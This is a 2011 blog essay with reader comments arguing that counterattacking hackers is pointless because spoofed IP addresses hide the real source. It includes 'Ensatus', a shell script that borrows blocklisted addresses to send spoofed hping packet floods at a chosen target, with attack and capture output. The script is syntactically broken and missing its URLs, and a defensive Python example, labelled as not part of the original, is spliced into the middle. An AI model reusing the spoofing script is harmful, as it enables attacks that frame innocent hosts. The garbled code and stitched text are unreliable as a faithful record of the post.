The Art of Cyber Warfare: Counterattack Fail

Monday, April 18, 2011

J. Oquendo


Across the United States, we enjoy the protections not only of the Constitution but also of our state constitutions, which follow the U.S. Constitution almost to the letter.

Using a snippet from the State of California's constitution, we have: "All people are by nature free and independent and have inalienable rights. Among these are enjoying and defending life and liberty, acquiring, possessing, and protecting property, and pursuing and obtaining safety, happiness, and privacy."

Pennsylvania [2], Maine [3], New Hampshire [4], Idaho [5] and other states have similar, if not identical, wording.

Following the words to the letter, how can we apply the same rights to today's rapidly changing world of information security? With so many laws coming and going, I decided to take a walk on the wild side and claim that I can legally counter-hack an attacker.

Understanding how will require a bit of skepticism and a desire to become case law; nevertheless, I will lay out my reasoning for being able to counterattack a hacker trying to compromise my network. Along with that, I will also point out why counterattacking will never work.

Initially I was not going to get into this topic; however, I have received more and more e-mails this quarter about counterattacking. Personally, I see it as a pointless task littered with free tickets to Club Fed, but hopefully someone in the legal realm can chime in with a counter-article or commentary.

In trying to write this, I spent quite a few hours trying to track down a security incident from the early '90s. Someone in the military had broken into another military machine. He was arrested and charged, but found not guilty of hacking.

You see, back then, banners were non-existent. He never had a warning telling him "thou shall not hack into thy superior's machines," so he skated away on a technicality. This led to the warning banners that many system and network administrators now deploy across machines [6], and while many may not know the origin of this "pseudo-law," many practice creating "Warning Banners."

With that brief bit of security history out of the way, there is no need to introduce the history of SLAs or TOS agreements; we simply know that for our interconnections to work, almost every business will have an SLA and TOS dictating what both parties can and can't do and what they can or can't expect from the partnership/agreement.

Imagine the following banner for a moment:

```
$ more /etc/motd
```

Cyber Warfare Counter Attack Fail

It is a simple and straightforward warning. In order for you to connect to me, you must allow my systems to check the weaknesses in your systems. As a partnership, this is actually beneficial as I could notify you of vulnerabilities before an attacker reaches them.

On the other hand, I am placing myself in harm's way: potential loss of clients; lawsuits from someone who did not read the TOS or SLA, not to mention the banner; higher rates from a carrier for excessive bandwidth use; and, not least, interconnected peers and networks will not be happy about what looks like an attack leaving my network, which could get me blacklisted.

Nevertheless, legally, I am covering myself with wording. Not only covering myself with my wording, but to a degree "enjoying and defending life and liberty, acquiring, possessing, and protecting property, and pursuing and obtaining safety, happiness, and privacy." As a provider of a service, I have the right to protect my privacy, since it is my system, and the privacy of the data that resides on my systems.

It is ironic how broadly some laws can be defined and interpreted. Because those laws are older than most computers, whether they apply here has simply never been tested. Does this mean we should turn the Internet into the Wild Wild West? Not really, unless you want to pursue a stint in federal prison while you either make or test case law.

Let us now imagine that this were indeed the case: one could counterattack based on an absurd TOS, SLA or other legal verbiage. "Counterattacking is now legal!!!" Game over. Not for you, not for me, not for the attacker, but for almost everyone who is interconnected, as it would be the equivalent of a constant "cyber drive-by" shooting, with absolutely no winners, only losers.

Because counterattacking is legal (remember, we're imagining it is), I reserve the right to perform a penetration test against anyone connecting to me. But who exactly is connecting to me? I will never be able to see who is behind an IP address, and therein lies the problem. I pointed this out in the "Decomposition Fail" chapter [7] of my "Art of Cyberwarfare" series: an IP address is not an identifier, especially when it comes to "cyberwarfare."

To drive the point home, here is a concoction I whipped up called Ensatus. Its purpose is to attack a target of my choice while picking out an already established bad guy and pretending to be that bad guy.

The sole purpose of Ensatus is deception, and it drives home the "fail" of counterattacking. If I were performing a sanctioned penetration test, there is a high likelihood that I would be using decoys. If counterattacking were legal, you would be counterattacking an innocent victim at that point.

```sh
# Ensatus v.0 (there will be no other versions...)
# J. Oquendo

# Proof of concept diversion/covertness generation script.
# Concept is simple, go out get a random "dirty host" via
# Spamhaus in this instance then use that host as a source
# of an attack. To be used while one is say performing a
# penetration test. The goal is simple to generate dirty
# traffic in an effort to "blend in with the crowd."

# Because I like ugly

ranport=$(( 1+( $(od -An -N2 -i /dev/random) )%(32-1+1) ))
sndport=`echo $ranport | sed 's:-::g' | sed -n '1p'`
pktsnum=$(( 500+( $(od -An -N2 -i /dev/random) )%(500-1+1) ))
randnet=`echo "sed -n '$rantarg" | sed 's:$:p'\'' /tmp/suckers:g'|sh`

wget -qO - | awk -F "/" '{print $1}' |\
sed 's:0$::g;s:$\.::g' > /tmp/suckers

if [ ! -f $sucker ];

wget -qO - |\
awk -F "/" '{print $1}' | sed 's:0$::g;s:$\.::g' > /tmp/suckers

echo "Enter target"
read targeted

echo sending hping -8 $sndport -c $pktnum -a $randnet.$rantarg $targeted |sed 's:\.\.:\.:g'
echo "How many instances should we send out? (enter a number)"

read number

while [ $i -lt 10 ]

echo hping -8 $sndport -c $sndport -i 100 -a $randnet.$rantarg $targeted |sed 's:\.\.:\.:g' |\ sh &
```



Does it work? From the attacker machine (sanitized for a clean look):

```
root@axios:~/ENS# uname -a
Linux axios #1 SMP Thu Jun 18 10:57:32 EDT 2009 i686 GNU/Linux

root@axios:~/ENS# ./

Enter target

sending hping -8 24 -c -a

How many instances should we send out? (enter a number)

Scanning (, port 24

1 ports to scan, use -V to see all the replies

|port| serv name |  flags  |ttl| id  | win |
```


On the victim end, this is the output via Wireshark's command-line capture tool, tshark [8]:

```
root@chousen:/home/sil# uname -a
Linux chousen 2.6.35-27 SMP Tue Feb 22 20:25:29 UTC 2011 i686 GNU/Linux

root@chousen:/home/sil# tshark -i eth0 -R "ip.addr ==" > OUT.txt
Running as user "root" and group "root". This could be dangerous.
Capturing on eth0
^C20 packets captured

root@chousen:/home/sil# more OUT.txt
1.348529 ->   TCP rap-listen > 24 [] Seq=1 Win=512 Len=0
1.348576 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.356178 ->   TCP [TCP Dup ACK 18#1] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.356196 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.386481 ->   TCP [TCP Dup ACK 18#2] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.386502 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.464751 ->   TCP [TCP Dup ACK 18#3] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.464780 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.554046 ->   TCP [TCP Dup ACK 18#4] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.554074 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.596722 ->   TCP [TCP Dup ACK 18#5] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.596748 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.607143 ->   TCP [TCP Dup ACK 18#6] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.607164 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.648786 ->   TCP [TCP Dup ACK 18#7] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.648805 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.724455 ->   TCP [TCP Dup ACK 18#8] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.724499 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.740352 ->   TCP [TCP Dup ACK 18#9] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.740375 -> TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
```
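The capture above is all the victim ever gets to see: a source address in a header and a bare probe that the kernel answered with RST/ACK. To make the article's point concrete from the defender's side, here is an added example (not part of the original post, and not the author's Ensatus code) that parses tshark one-line output in that format and, per remote address, separates sources that only ever sent bare SYN probes from sources that actually completed a three-way handshake. A spoofed source can put anything in the source field, but it never receives the SYN/ACK and so never sends the final ACK; a completed handshake is therefore the minimum evidence that an address is a real, reachable host (which still says nothing about who is behind it). The capture lines, the `198.51.100.5` "victim" address and the `192.0.2.0/24` sources are constructed sample data, since the article's capture has its addresses sanitized out.

```python
import re
from collections import defaultdict

# Constructed sample in tshark's default one-line format (documentation
# address ranges; not the article's capture). 198.51.100.5 is the local host.
# Three sources send bare SYNs to port 24 and only ever get RST/ACK back;
# 192.0.2.40 is an ordinary client that completes a handshake to port 22.
SAMPLE_CAPTURE = """\
1.348529 192.0.2.10 -> 198.51.100.5 TCP 1212 > 24 [SYN] Seq=0 Win=512 Len=0
1.348576 198.51.100.5 -> 192.0.2.10 TCP 24 > 1212 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.356178 192.0.2.10 -> 198.51.100.5 TCP [TCP Retransmission] 1212 > 24 [SYN] Seq=0 Win=512 Len=0
1.356196 198.51.100.5 -> 192.0.2.10 TCP 24 > 1212 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.386481 192.0.2.77 -> 198.51.100.5 TCP 1212 > 24 [SYN] Seq=0 Win=512 Len=0
1.386502 198.51.100.5 -> 192.0.2.77 TCP 24 > 1212 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.464751 192.0.2.201 -> 198.51.100.5 TCP 1212 > 24 [SYN] Seq=0 Win=512 Len=0
1.464780 198.51.100.5 -> 192.0.2.201 TCP 24 > 1212 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
2.000000 192.0.2.40 -> 198.51.100.5 TCP 51000 > 22 [SYN] Seq=0 Win=65535 Len=0
2.000100 198.51.100.5 -> 192.0.2.40 TCP 22 > 51000 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0
2.000300 192.0.2.40 -> 198.51.100.5 TCP 51000 > 22 [ACK] Seq=1 Ack=1 Win=65535 Len=0
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<src>\S+)\s+->\s+(?P<dst>\S+)\s+TCP\s+"
    r"(?:\[[^\]]*\]\s+)?"  # optional analysis note such as [TCP Retransmission]
    r"(?P<sport>\S+)\s+>\s+(?P<dport>\S+)\s+\[(?P<flags>[^\]]*)\]"
)


def parse_capture(text):
    """Turn tshark one-line TCP summaries into dicts; lines that do not match are skipped."""
    packets = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        pkt = m.groupdict()
        pkt["flags"] = {f.strip() for f in pkt["flags"].split(",") if f.strip()}
        packets.append(pkt)
    return packets


def summarize_sources(packets, local_ip):
    """Per remote address: bare-SYN probe count, ports touched, and whether a
    handshake to us was ever completed (an inbound ACK that answers a SYN/ACK
    we actually sent to that address and port)."""
    summary = defaultdict(lambda: {"syn_probes": 0, "ports": set(),
                                   "handshake_completed": False})
    pending = set()  # (remote_ip, remote_port) pairs we have sent a SYN/ACK to
    for p in packets:  # packets are in capture (time) order
        if p["src"] == local_ip and p["flags"] == {"SYN", "ACK"}:
            pending.add((p["dst"], p["dport"]))
        if p["dst"] != local_ip:
            continue
        entry = summary[p["src"]]
        if p["flags"] == {"SYN"}:
            entry["syn_probes"] += 1
            entry["ports"].add(p["dport"])
        elif p["flags"] == {"ACK"} and (p["src"], p["sport"]) in pending:
            entry["handshake_completed"] = True
    return dict(summary)


def attribution_verdict(entry):
    """What the capture can say about a source address.
    'reachable': the host received our SYN/ACK, so it exists at that address.
    'unverified': only bare probes seen; the source field may be anyone's."""
    return "reachable" if entry["handshake_completed"] else "unverified"


def triage(text, local_ip):
    """Map each remote address in a capture to its attribution verdict."""
    return {src: attribution_verdict(e)
            for src, e in summarize_sources(parse_capture(text), local_ip).items()}


if __name__ == "__main__":
    for src, verdict in sorted(triage(SAMPLE_CAPTURE, "198.51.100.5").items()):
        print(f"{src:14} {verdict}")
```

Every one of the three port-24 probers comes out as "unverified": from the packet alone there is no way to tell a real scanner from an Ensatus-style decoy wearing a blocklisted address, which is exactly why an automated response keyed on that field lands on whoever was chosen as the mask. The only address the capture vouches for at all is the one that finished a handshake, and even that is a machine, not a person.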

Now imagine the victim machine were to counterattack: both sides lose. Not only would both sides lose, but everyone in between would lose, as the victim would need to spend bandwidth to counter, not to forget that the other side is also a victim. If that side also had a counterattacking mechanism in place, you'd have the equivalent of a reflection between two mirrors, never ending.

We must remember that many attackers are never going to come from their true address. So what would be the point of ever attempting to counterattack, or of creating an application or system that does so?

On the contrary, this would lead to more problems than one could ever wish for. Also, because of the flaws in the basic structure of IP, attackers would likely endorse these absurd products: while these systems were busy countering ghosts, an attacker would have even greater ability to blend into the crowd.

After all that has been written, I do believe it would be possible to counterattack legally; however, it would be as absurd as believing that it would make an iota of difference in stopping an attacker, preventing future attacks, deterring potential attackers, or even gathering any actionable information about a real attacker.


Cross-posted from Infiltrated

Matthew Ancelin: J, I truly appreciate your article, and it does ring true as to how things would play out in a 'legal counterattack' world. I don't think that anyone reading this would disagree that we DO counterattack from a law enforcement/fed agency level today... an example would be the Stuxnet attack against Iran's nuclear program. Just this morning, I see this article: once again citing that our favorite new business partner, China, is also simultaneously attacking us daily. If widespread counter-attack is not feasible, I guess the hidden war will rage on, government vs. government, company vs. company.
Robert Gezelter: This has always been true.

Systems managers and IT security personnel are not authorized to take offensive action. While satisfying, "Fire if fired upon" is a concept appropriate for armed services, not civilians.

In the Computer Security Handbook, 4th Edition (2002), I noted this in two places:

- in Sections 21.1.6 et seq. (pp. 21-3), I noted that "counter battery" is not an acceptable response to a cyber attack.

- the conclusion of Section 22.4, "Rules of Engagement" (pp. 22-10):

"In summary, when protecting Web sites and customers, defensive actions are almost always permissible, and offensive actions of any kind are almost always impermissible. Defensive actions that are transparent to the customer are best of all."